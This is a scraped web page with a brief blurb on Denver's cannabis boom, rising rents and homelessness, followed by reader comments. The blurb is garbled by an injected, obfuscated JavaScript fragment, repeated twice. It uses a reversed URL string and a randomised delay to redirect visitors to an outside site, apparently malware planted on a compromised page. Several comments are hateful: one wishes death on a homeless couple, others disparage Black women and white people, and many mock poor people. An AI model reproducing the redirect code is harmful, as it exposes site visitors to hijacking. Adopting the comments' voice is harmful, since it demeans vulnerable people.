Denver's Cannabis Boom and Housing Bust

In Denver, the rise of the legal cannabis business has a connection toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to a major problem: rising rents leading toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to a lack of affordable housing and increased homelessness.

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47 thoughts on “Denver's Cannabis Boom and Housing Bust”

  1. #Smile Gaming says:

    Taking away their blankets.. C'mon boys thts straight fucky.

  2. Nicholas Schumann says:

    If you can't afford to live there, don't move there. I always wanted to move to Denver, so I worked my ass off trying to get a job there while I lived in a different state. After multiple rejections I landed a minimum wage job as an EMT and moved there. Even on minimum wage, with good budgeting and long hours of work, I lived in a nice apartment with no real financial trouble. It's not impossible and neither Denver nor life owes you anything.

  3. libertyforamericanow says:

    There's legal weed, there should be plenty tax money to take car of he homeless

  4. Stillinhaling THC says:

    I use to live in that area at 5:53 for many years, 12 years in CO in general and can't believe how fast prices property prices increased.

  5. Brian says:

    If they’re not welcome , why do they stay?

  6. Meat Wad says:

    Dave Ramsey

  7. fernando tario says:

    I miss denver

  8. TheSwimpsu99 says:

    I live here in Denver and this is the dumbest piece iv ever seen….it does not talk about the buildings going up before Weed, the oil and gas that brings jobs in, and the great companies moving their business to the area… talks about weed……Sorry VICE…you sucked on this one…Rent goes up…deal with it

  9. Jeff Crampton says:

    go get your hustle on home boy with a baby on the way 313

  10. Gregory Vierra says:

    Maybe the dude should get up before noon and go look for a job. "We have way too much determination to be in this situation"…Jesus, there is hope for me yet.

  11. Ethan Louque says:

    I moved to Denver in 2015. I got kinda lucky but I got there with 350 bucks. I got a job the first week. The jobs in Denver are definitely there if you want one

  12. Alex Ruiz says:

    Don’t move to Colorado please and thank you, we’re good

  13. stophavingkids says:

    straight mall grab

  14. yahemii swagcity says:

    I don't want to be insensitive but why doesn't the guy get up before 12 and look for a job

  15. Jay Jayu says:

    Why couldn't vice help them??…

  16. HelikaonIX says:

    At least in Denver there's space for growth which means construction and more jobs being created (in at least the service sector) for the influx of people. In the Bay Area we're pinned between the mountains, no space to grow and people keep filing in.

  17. WiiNESticles says:

    Well I used to like Viceland, but now I don't. Why should working class people have to pay for pot heads that moved here just to smoke weed, with no means to live? The irony is overwhelming, you want weed, we gave it to you, except an effect of legal weed was an influx of people moving to Colorado, which guess what WILL DRIVE UP THE COST OF HOUSING!
    This is the most basic example of supply and demand.

    Shocker someone WHO WAKES UP AT NOON to look for a job, doesn't have enough means to live somewhere expensive. MAYBE you should have thought about that before having a second kid when you're homeless and relocating to somewhere you knew nothing about. There are tons of homeless kids here because they came for the weed and now people who work and pay taxes suffer the burden of it. This story is a joke.

  18. DarthIke77 says:

    People need to start recognizing this issue for what it really is. This isn't a result of Colorado's legalization. This is exposure of the harms of prohibition, magnified by fact that so many people are rushing to the area after Colorado did the right thing and legalized.

  19. Parker Nesbitt says:

    It's pretty easy to get away with smoking weed in Missouri and my rent here is $216 a month. Lol

  20. Ger Vas says:

    All that money in tax revenue they should help them.

  21. Rusty Bucket 5000 says:

    deadbeats…. sleeping till 12. getting pregnant w/no job… c'mon… grow up

  22. chigasaki06 says:

    America…land of the greedy.

  23. Born Justice Rule says:


  24. Scy says:

    I'm not going to bash this couple but they do in fact need to get their shit together. He needs to get up early, go to the library and put in applications non stop, get tattoo makeup to cover up those regrettable penatentry permanent "art" on his neck, sharpen up and get the fucking job done. All the Wife needs to do is to continually keep seeking help from Welfare to help get them on their feet until she is able to work again, they have alot of services that they can utilize like first month rent help, food stamps, pantries, grassroots, vehicles for change etc I mean the list goes on the Government does care and so do Non Profit Organizations. Or move back to where you guys were at least stable and actually have a legit plan plus money to move again.

  25. Dani Marie says:

    Maybe he'd have a job if he didn't sleep 'til noon.

  26. Ivan Lira says:

    I feel bad for the family. Little girl is so cute and innocent. Doesn't fully understand what her family is going through. What a shame for her to have a lazy ass of a father. The wife seems to have no other choice. Idk this sucks, I feel horrible cause i've been in that position when I was a little kid coming from Mexico to the US. But this also makes me feel pretty blessed. Blessed to have a well paying full-time job with lots of ot, no kids and no spouse. Barely 22, 401k, a roof over my head and a 96 tacoma taking me from point A to point B. Best of luck to that family; really hope they make it out of the streets.

  27. Chedarmentos Brown says:

    Housing has always been expensive in Colorado. I was homeless there for years before and after the cannabis. In 2000 I paid 1300 a month for a room in a house.

  28. Einherie says:

    What stops all this lowlife from moving out of Denver to more affordable areas and finding ANY kind of job there? I guess they won't be able to leach on generous liberals in that case.

  29. seth fish says:

    "Denver has become gentrified and homogenized." shows white girl taking picture of her dog. I died lol

  30. Smalltownbrewer1 says:

    Wow that dude is a loser….. no wonder their broke

  31. RayTan Xo says:

    why do struggle have to involve black people? seriously
    as black myself, I'm starting doubting our intellectual facilities to solve our problems.

  32. Michael Niel says:

    And hey Indian guy… can u give them a couple hundred bucks to get a hotel? I don’t know if this shit is real or what. This channel needs to go

  33. WEBעכביש says:

    Where they move from?

  34. ChristopherandHobbes says:

    G E N T R I F I E D

  35. blacknight39 says:

    Black women choose the WORST men regardless of skin color!!!!

  36. Ian B says:

    Im in the hood every week.. Park Hill and its crazy to see white people walking around with their dogs with no problem.

  37. KNOW THYSELF says:

    poverty like this is a decision, fuck them I hope  the parents are killed and the child finds a better situation

  38. Jonathan Reed says:

    Wow this sounds like a good ad for a slimey lawyer to come stick his face on…oh wait…too late

  39. nose gt says:

    bad place to live. all you see in downtown is young kids smoking pot fights. Kids smoking pot at school very bad place to live

  40. Jack Mundo says:

    This woman’s got real trouble.

  41. Yeska Buena says:

    What I and THE WORLD wanna know.. where is our weed tax going??!?

  42. Anthony Ledington says:

    Dude dont need to smoke weed.

  43. Brick & Mortar Studio says:

    Basically it’s another San Francisco in Making. Drugs, homelessness, high crime and sky rocketed housing cost..

  44. Fernando Vasquez says:

    Its eat or be eaten, every man for himself. Haha it’s mostly white that you see on the street , so fuck them anyway

  45. K says:

    My family in Denver 75 years. The city is disgusting now. I clean up poop and homeless trash Every Day. These people are disgusting, my patience is gone. They’re scary. I wish they had sweeps every day, then maybe these people would move on or get it together

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